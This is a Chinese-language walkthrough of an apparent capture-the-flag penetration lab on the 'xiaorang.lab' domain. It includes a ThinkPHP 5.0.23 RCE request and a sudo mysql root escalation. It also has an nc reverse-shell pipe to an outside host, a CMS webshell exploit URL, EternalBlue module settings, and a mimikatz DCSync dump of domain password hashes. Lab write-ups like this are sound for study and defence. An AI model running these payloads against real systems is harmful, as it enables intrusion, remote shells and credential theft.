Flag01

进去是一个登录页面,扫一下看到了报错页面,发现TP版本

TP5.0.23 RCE

写马或者弹shell

POST /index.php?s=captcha HTTP/1.1
Host: 39.99.252.41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Origin: http://39.99.252.41
Connection: close
Referer: http://39.99.252.41/index.php?s=captcha
Upgrade-Insecure-Requests: 1

_method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_METHOD%5D=ls /

提权

sudo -l 查看到当前用户可以以sodu身份执行的语句

执行后发现回显

(root) NOPASSWORD: /usr/bin/mysql

说明我们当前(www-data)可以通过sudo免密码以root权限执行mysql

mysql是可以执行系统命令的

mysql -e '\! id'
/*
-e:MySQL 客户端选项,用于执行后面的命令。
\! id:在 MySQL 客户端中运行一个外部系统命令。\! 是 MySQL 客户端中的一个特殊转义符,用来执行外部的系统命令
*/

我们可以用此方法提权到root,弹一个shell

sudo /usr/bin/mysql -e '\! /bin/sh'

但是弹的shell无回显,只能执行命令没有执行结果,两个nc转发回显

nc 47.120.32.120 10000| /bin/bash | nc 47.120.32.120 10001

flag01在/root/flag/flag01.txt

image-20240530162822498

start infoscan
(icmp) Target 172.22.1.15     is alive
(icmp) Target 172.22.1.18     is alive
(icmp) Target 172.22.1.21     is alive
(icmp) Target 172.22.1.2      is alive
[*] Icmp alive hosts len is: 4
172.22.1.2:445 open
172.22.1.18:445 open
172.22.1.21:445 open
172.22.1.2:139 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:135 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:3306 open
172.22.1.2:88 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo 
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetInfo 
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo 
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] OsInfo 172.22.1.2   (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21        (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
已完成 14/14
[*] 扫描结束,耗时: 8.299997311s

Flag02

通过上面fscan的扫描,发现一个MS17-010和一个Web站点,先看Web站点

发现一个CMS,网上有公开EXP,写个马进去

image-20240530182244905

http://172.22.1.18/task.php/?m=qcloudCos|runt&a=run&fileid=12

image-20240530182259494

image-20240530182308682

image-20240530182415885

Flag03

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         172.22.1.21      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Wind
                                             ows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows
                                             Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded S
                                             tandard 7 target machines.


Payload options (windows/x64/meterpreter/bind_tcp_uuid):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.22.1.21      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

打永恒之蓝

Flag04

拿到永恒之蓝打DCSync攻击

DCSync的原理是利用域控制器之间的数据同步复制
DCSync是AD域渗透中常用的凭据窃取手段,默认情况下,域内不同DC每隔15分钟会进行一次数据同步,当一个DC从另外一个DC同步数据时,发起请求的一方会通过目录复制协议(MS- DRSR)来对另外一台域控中的域用户密码进行复制,DCSync就是利用这个原理,“模拟”DC向真实DC发送数据同步请求,获取用户凭据数据,由于这种攻击利用了Windows RPC协议,并不需要登陆域控或者在域控上落地文件,避免触发EDR告警,因此DCSync时一种非常隐蔽的凭据窃取方式
DCSync 攻击前提:
想进行DCSync 攻击,必须获得以下任一用户的权限:
Administrators 组内的用户
Domain Admins 组内的用户
Enterprise Admins 组内的用户域控制器的计算机帐户
即:默认情况下域管理员组具有该权限
我们在获得的MS17-010这台机器加载mimikatz,并且本机是system权限
加载mimikatz
meterpreter> load kiwi
meterpreter> kiwi_cmd privilege::debug(提升权限,这个需要system权限)
导出域内哈希:

meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
1000    DC01$   edc506302bf9b040febfb84a1459c0e8        532480
1104    XIAORANG-OA01$  673ec2d0ad2f73341c4b3e1fc2fbade5        4096
1103    XIAORANG-WIN7$  507797b66f76b8b71d20555b0c59f86d        4096
meterpreter > load kiwi
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.

image-20240530214043754

image-20240530214629756

image-20240530212229335